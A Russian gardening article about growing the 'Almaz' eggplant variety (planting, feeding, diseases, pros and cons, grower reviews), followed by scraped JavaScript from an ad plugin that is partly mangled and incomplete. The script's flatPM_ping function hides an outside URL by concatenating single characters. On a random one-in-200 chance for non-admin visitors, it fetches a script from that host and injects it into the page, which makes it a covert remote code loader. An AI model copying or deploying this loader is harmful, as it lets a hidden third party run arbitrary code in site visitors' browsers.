В южных регионах высаживают прямо семенами в открытый грунт в мае-месяце, а в северных и центральных — рассадой, на месяц позже (июнь).

Прежде, чем высаживают саженцы Алмаза, готовят почву.

  1. Землю надо тщательно взрыхлить, внести органику: компост или навоз.
  2. Сделать ямки, соблюдая расстояние между ними не менее 75 см.
  3. Высадить рассаду, заглубляя корни на 7-8 см.
  4. Молодые саженцы не должны стоять под палящими лучами солнца, хотя бы несколько дней, пока растения адаптируются на новом месте.

Уход после посадки в теплицу или открытый грунт

Если рассада баклажана Алмаз прижилась на постоянном месте, уход за культурой минимален:

Первый раз после посадки поливают через 10 дней. Ежедневный полив не требуется, достаточно поливать растение два раза в неделю.

Почву рыхлят с целью доступа воздуха корневой системе, удаляют сорняки, поскольку они могут стать причиной болезней баклажанов:

Подкармливают кустики баклажанов 3 раза.

  1. Мочевиной через полмесяца после посадки на место произрастания.
  2. Мочевина + суперфосфат — через месяц.
  3. Когда появляются плоды, подкармливают коровьим навозом.
  4. Если завязей мало, можно внести калий.

В случае недостаточного опыления цветков специально завлекают опыляющих насекомых. С этой целью на кустики разбрызгивают сладкий раствор, для приготовления которого понадобятся:

  • борная кислота — 2-3 г;
  • сахар — 100 г;
  • горячая вода — 1 л.

Необходимость пасынковать баклажан Алмаз — вопрос спорный. У огородников нет единого мнения на этот счет.

Устойчивость к болезням и вредителям

Хотя сорт Алмаз позиционируется создателями как устойчивый к различным болезням, но неверный уход может привести к тому, что растение заболеет или зачахнет. Оно может быть поражено.

  1. Фитофторозом. На листочках появляются белые пятна. Куст погибнет.
  2. Появление черных точек на растении информирует о поедании зелени крестоцветной блошкой. Она может полностью уничтожить саженец.
  3. При переувлажнении почвы — черная ножка. Она может привести к гибели растения.
  4. Образование необычного рисунка на листочках и плодах говорит о заболевании — мозаика.

Чтобы уберечь баклажаны от болезней, необходимы:

  • правильная подготовка семян;
  • семядольные листочки должны оставаться над землей;
  • постоянное обрывание больных растений;
  • поливать нехолодной водой.

Из вредителей особенно опасен колорадский жук. С ним бороться можно по старинке. Собирать вручную. Можно опрыскать средством (в магазине богатый выбор) против этого вредителя.

Достоинства и недостатки сорта

Несмотря на любовь огородников к сорту Алмаз, у него помимо плюсов, есть ряд недостатков.

Достоинства Недостатки
Не гибрид. Нередко поражается фитофторозом и вершинной гнилью.
Богатые урожаи, 8,5 кг с 1 кв.м. В мякоти содержится много семечек.
Приятный вкус плодов, не горчат. Плоды появляются внизу куста. Избежать загнивания от соприкасания с землей, помогут опилки или солома.
Сорт стойкий к изменениям климата (засуха и проч.).
На чашечке нет шипов, легче собирать урожай.
Транспортабельны, поскольку имеют плотную и крепкую кожицу.
Пригодны для приготовления и консервации.
Долго хранятся.

Отзывы

По отзывам многих любителей баклажанов, сорт Алмаз надежный, так как после неудачных попыток сажать другие виды «синеньких», более дорогих по цене, не подводил исключительно Алмаз.

Нравится этот сорт за щедрый урожай и не слишком хлопотный уход. Правда, есть садоводы, которые считают данный сорт недостаточно устойчивым к болезням, и цена на семена у некоторых производителей завышена. Но таких отзывов мало.

В основном огородники тепло отзываются о данном сорте баклажанов.

Реальные отзывы людей, выращивающих баклажан Алмаз:

Черный красавец, Донецкий урожайный и другие, но сделала я свой выбор в пользу сорта Алмаз. По вкусовым качествам он понравился мне больше остальных. — Отзовик(Tina49)

И только Алмаз пока меня не подводил. Причем, и рассада росла удачно, и потом урожай собирали хороший. Поэтому считаю этот сорт не очень капризным. — Отзовик(Degaev)

Самый неприхотливый и стабильный — Алмаз, плодоносит при любой погоде. — Форум Наша Дача(Sunl)

Сажаю каждый год баклажан Алмаз. Он у меня в любимчиках. Всегда отличный урожай. Вкусный, кожица тонкая. Сажала еще Черный красавец,только место занимал, так плодов с него и не увидела. — Клуб томатоводов(Eliseushka)

А вам понравился сорт баклажанов Алмаз? Поставьте свою оценку!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};